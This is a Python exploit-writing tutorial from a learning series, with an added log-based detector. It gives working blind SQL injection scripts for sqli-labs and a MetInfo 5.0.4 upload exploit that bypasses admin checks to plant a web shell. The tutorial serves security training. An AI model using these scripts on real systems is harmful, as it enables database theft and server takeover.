[CyberSecurityLearning 68] Writing exp in Python

Published: 2025/3/15 python 40 豆豆

Contents

Writing exp in Python

Boolean-based blind injection with a Python script

Time-based (delay) injection with a Python script

File upload

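Writing exp in Python

exp: exploit (a vulnerability exploitation tool)

The focus is on web vulnerabilities.

Requirements:
1. Be able to read an exp written by someone else, and modify it
2. Be able to write an exp yourself

Base environment: python3

Core module: requests
For a detailed introduction to the requests module, see:
https://blog.csdn.net/Waffle666/article/details/115720052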

Custom headers

Redefining the User-Agent

Timeouts

Passing parameters with GET

Passing parameters with POST

File upload

Cookie information


Boolean-based blind injection with a Python script

Using level 8 of sqli-labs as the example

import requests
import string

url = "http://192.168.3.102:82/Less-8/"

# Baseline: length of the page returned when the condition is true
normalHtmlLen = len(requests.get(url=url + "?id=1").text)
print("The len of HTML: " + str(normalHtmlLen))

# Guess the length of the database name; a guess is correct when the
# response has the same length as the baseline page
dbNameLen = 0
while True:
    dbNameLen_url = url + "?id=1'+and+length(database())=" + str(dbNameLen) + "--+"
    # print(dbNameLen_url)
    if len(requests.get(dbNameLen_url).text) == normalHtmlLen:
        print("The len of dbNameLen: " + str(dbNameLen))
        break
    if dbNameLen == 30:
        print("ERROR!")
        break
    dbNameLen += 1

# Recover the database name one character at a time
dbName = ""
for i in range(1, dbNameLen + 1):
    for a in string.ascii_lowercase:
        dbName_url = url + "?id=1'+and+substr(database()," + str(i) + ",1)='" + a + "'--+"
        # print(dbName_url)
        if len(requests.get(dbName_url).text) == normalHtmlLen:
            dbName += a
            print("The dbName :" + dbName)
            break

Time-based (delay) injection with a Python script

Using level 9 of sqli-labs as the example

import requests
import string

url = "http://192.168.3.102:82/Less-9/"

def timeOut(url):
    # The request is cut off after 3 seconds, so a sleep(5) that actually
    # ran on the server shows up here as a timeout
    try:
        res = requests.get(url, timeout=3)
        return res.text
    except requests.exceptions.Timeout:
        return "timeout"

# Guess the length of the database name; the correct guess triggers sleep(5)
dbNameLen = 0
while True:
    dbNameLen += 1
    dbNameLen_url = url + "?id=1'+and+if(length(database())=" + str(dbNameLen) + ",sleep(5),1) --+"
    # print(dbNameLen_url)
    if "timeout" in timeOut(dbNameLen_url):
        print("The Len of dbName: " + str(dbNameLen))
        break
    if dbNameLen == 30:
        print("ERROR!")
        break

# Recover the database name one character at a time
dbName = ""
for i in range(1, dbNameLen + 1):
    for char in string.ascii_lowercase:
        dbName_url = url + "?id=1'+and+if(substr(database()," + str(i) + ",1)='" + char + "',sleep(5),1)--+"
        # print(dbName_url)
        if "timeout" in timeOut(dbName_url):
            dbName += char
            print("The dbName :" + dbName)
            break
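
Seen from the server side, both scripts above leave the same trace in an access log: one client repeating a request whose injected parameter differs only in a number or a single character. The following is an added example for detecting that pattern, not code from the original post; the combined log format, the client addresses, the threshold of 5 and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Client address and request target from a combined-format access log line.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')
# SQL fragments that the length/substr/sleep guesses above depend on.
PROBE_RE = re.compile(
    r"\b(?:sleep|benchmark)\s*\(|\b(?:substr|substring|mid|length|ascii)\s*\(\s*database\s*\(",
    re.I)
# Parts that change from one guess to the next: numbers and one-character literals.
VARIANT_RE = re.compile(r"\d+|'[^']?'")


def probe_template(target):
    """Return 'param=<normalised value>' for an injected parameter, else None."""
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if PROBE_RE.search(value):
            return name + "=" + VARIANT_RE.sub("?", value.strip().lower())
    return None


def find_blind_sqli(log_text, min_requests=5):
    """Count requests per (client, path, template); keep the repeated ones."""
    counts = defaultdict(int)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        template = probe_template(m.group(2))
        if template:
            counts[(m.group(1), urlsplit(m.group(2)).path, template)] += 1
    return {key: n for key, n in counts.items() if n >= min_requests}


def build_sample_log():
    """Constructed sample lines (not real traffic) shaped like the scripts' requests."""
    fmt = '{ip} - - [15/Mar/2025:10:00:{s:02d} +0000] "GET {t} HTTP/1.1" 200 706'
    targets = ["/Less-8/?id=1'+and+length(database())=%d--+" % n for n in range(1, 9)]
    targets += ["/Less-9/?id=1'+and+if(substr(database(),1,1)='%s',sleep(5),1)--+" % c
                for c in "abcdefg"]
    lines = [fmt.format(ip="10.0.0.5", s=i, t=t) for i, t in enumerate(targets)]
    lines += [fmt.format(ip="10.0.0.9", s=30 + i, t="/Less-8/?id=%d" % i) for i in range(1, 7)]
    lines.append(fmt.format(ip="10.0.0.9", s=40, t="/search?q=how+to+sleep+better"))
    return "\n".join(lines)


if __name__ == "__main__":
    for (client, path, template), n in find_blind_sqli(build_sample_log()).items():
        print(client, path, n, template)
```

Normalising the guesses to one template is what makes the enumeration visible: each request on its own looks like a single odd query, while the grouped count shows the loop. The benign `/search` request containing the word "sleep" is not flagged because no function call follows it.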

File upload

Using Metinfov5.0.4 as the example:

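import requests
import sys

# argv[1]: base URL of the MetInfo install,
#          e.g. http://192.168.1.200/metinfov504/metinfov504
# argv[2]: path of the local file to upload
url = sys.argv[1]
path = sys.argv[2]

postUrl = url + "/admin/include/uploadify.php?metinfo_admin_id=aaa&metinfo_admin_pass=123.com&met_admin_table=met_admin_table%23&type=upfile&met_file_format=jpg|pphphp"

with open(path, "rb") as f:
    upFile = {"FileData": f}
    res = requests.post(url=postUrl, files=upFile)

# The response body carries the stored file's path after a 4-character prefix
print("The Shell path:" + url + res.text[4:])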
